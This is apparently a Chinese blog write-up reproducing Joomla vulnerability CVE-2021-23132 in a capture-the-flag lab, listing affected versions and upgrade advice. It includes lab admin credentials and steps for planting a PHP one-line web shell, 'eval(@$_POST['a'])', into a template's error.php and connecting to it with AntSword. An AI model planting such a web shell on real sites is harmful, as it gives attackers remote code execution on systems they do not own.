2022年03月04日   温氏效应   103 次浏览   暂无评论  

漏洞介绍

Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行。

影响范围

3.0.0 <= Joomla! <= 3.9.24

漏洞复现

1.打开靶场环境,根据提示,后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456 ,我登录直接登录的是超级管理员账号进行操作的。因为中途有个地方要上传 config.xml 始终无法上传。

2.进入模板目录,编辑 Beez3 模板

Balloon trip
Balloon trip

编辑 error.php 页面,直接添加PHP一句话木马,添加完成后,点击上面的 Save 保存页面。
eval(@$_POST['a']);

Balloon trip

3.上蚁剑链接这个页面: http://localhost/templates/beez3/error.php

链接成功,获得flag

Balloon trip

修复建议

建议相关用户升级到3.9.25及以上版本。或者登陆系统后台,系统会提示升级,点击一下完成自动升级即可。

共有 0 条评论

发表评论